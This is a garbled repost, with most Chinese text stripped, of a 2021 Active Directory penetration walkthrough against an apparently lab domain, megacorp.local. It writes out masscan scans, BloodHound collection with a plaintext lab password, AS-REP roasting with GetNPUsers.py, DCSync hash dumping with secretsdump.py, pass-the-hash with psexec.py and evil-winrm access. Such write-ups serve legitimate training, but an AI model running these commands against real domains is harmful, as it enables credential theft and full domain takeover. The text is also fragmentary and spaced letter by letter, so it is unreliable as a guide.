[16842] 2021-05-29_利用BloodHound与Impacket进行域渗透实战

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-05-29_利用BloodHound与Impacket进行域渗透实战 B l o o d H o u n d I m p a c k e t w i n d c c t v   F r e e B u f   2 0 2 1 - 0 5 - 2 9 A C L 访 D c S y n c A c c e s s   T o k e n B l o o d H o u n d I m p a c k e t w e b s a n d r a : P a s s w o r d 1 2 3 4 ! m a s s c a n   - p   1 - 6 5 5 3 5   1 0 . 1 0 . 1 0 . 3 0   - e   t u n 0   r a t e = 1 0 0 0
n m a p 5 9 8 5 使 5 9 8 5 I m p a c k e t s a n d r a : P a s s w o r d 1 2 3 4 ! I m p a c k e r I m p a c k e t P s e x e c . p y s h e l l w m i e x e c . p y s h e l l
a t e x e c . p y T a s k   S c h e d u l e r s h e l l N e o 4 j + B l o o d h o u n d N e o 4 j N e o 4 j h t t p s : / / n e o 4 j . c o m / d o w n l o a d - c e n t e r / # c o m m u n i t y n e o 4 j 访 h t t p : / / l o c a l h o s t : 7 4 7 4 B l o o d h o u n d   h t t p s : / / g i t h u b . c o m / B l o o d H o u n d A D / B l o o d H o u n d N e o 4 j
B l o o d h o u n d p o w e r s h e l l S h a r p H o u n d . p s 1 S h a r p H o u n d . e x e b l o o d h o u n d . p y h t t p s : / / g i t h u b . c o m / f o x - i t / B l o o d H o u n d . p y p y t h o n 3   s e t u p . p y   i n s t a l l 4 c o m p u t e r s . j s o n d o m a i n s . j s o n g r o u p s . j s o n u s e r s . j s o n B l o o d h o u n d A n a l y s i s b l o o d h o u n d - p y t h o n   - d   m e g a c o r p . l o c a l   - u   s a n d r a   - p   " P a s s w o r d 1 2 3 4 ! "   - g c   p a t h f i n d e r . m e g a c o r p . l o c a l   - c   a l l   - n s   1 0 . 1 0 . 1 0 . 3 0
F i n d   a l l   D o m a i n   A d m i n s   F i n d   S h o r t e s t   P a t h s   t o   D o m a i n   A d m i n s   F i n d   P r i n c i p a l s   w i t h   D C S y n c   R i g h t s D C S y n c U s e r s   w i t h   F o r e i g n   D o m a i n   G r o u p   M e m b e r s h i p   G r o u p s   w i t h   F o r e i g n   D o m a i n   G r o u p   M e m b e r s h i p   M a p   D o m a i n   T r u s t s   S h o r t e s t   P a t h s   t o   U n c o n s t r a i n e d   D e l e g a t i o n   S y s t e m s   S h o r t e s t   P a t h s   f r o m   K e r b e r o a s t a b l e   U s e r s   K e r b e r o a s t a b l e S h o r t e s t   P a t h s   t o   D o m a i n   A d m i n s   f r o m   K e r b e r o a s t a b l e   U s e r s   K e r b e r o a s t a b l e 访 S h o r t e s t   P a t h   f r o m   O w n e d   P r i n c i p a l s   S h o r t e s t   P a t h s   t o   D o m a i n   A d m i n s   f r o m   O w n e d   P r i n c i p a l s   S h o r t e s t   P a t h s   t o   H i g h   V a l u e   T a r g e t s   绿 绿
D C S y n c s v c _ b e s G e n e r i c A l l
  N o d e   I n f o   A S R E P   R o a s t a b l e     T r u e A S - R E P   R o a s t i n g 线 2
便 s v c _ b e s G e t N P U s e r s . p y G e t N P U s e r s . p y I m p a c k e t K e r b e r o s T G T T G T   h a s h     J T R     h a s h c a t  
s v c _ b e s S h e f f i e l d 1 9 使 I m p a c k e t s e c r e t s d u m p . p y D C S y n c N T L M s e c r e t s d u m p . p y s e c r e t s d u m p . p y I m p a c k e t N T L M P T H 使 访 使 I m p a c k e t p s e x e c . p y p s e x e c . p y p s e x e c . p y I m p a c k e t W i n d o w s 使 s h e l l G e t N P U s e r s . p y   m e g a c o r p . l o c a l / s v c _ b e s   - r e q u e s t   - n o - p a s s   - d c - i p   1 0 . 1 0 . 1 0 . 3 0 s e c r e t s d u m p . p y   - d c - i p   1 0 . 1 0 . 1 0 . 3 0   M E G A C O R P . L O C A L / s v c _ b e s : S h e f f i e l d 1 9 @ 1 0 . 1 0 . 1 0 . 3 0 p s e x e c . p y   m e g a c o r p . l o c a l / a d m i n i s t r a t o r @ 1 0 . 1 0 . 1 0 . 3 0   - h a s h e s   :
便 5 9 8 5 e v i l - w i n r m e v i l - w i n r m e v i l - w i n r m W i n d o w s ( W i n R M )   S h e l l M i c r o s o f t   W i n d o w s 使 5 9 8 5 使 使 g e m   i n s t a l l   e v i l - w i n r m s a n d r a s h e l l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则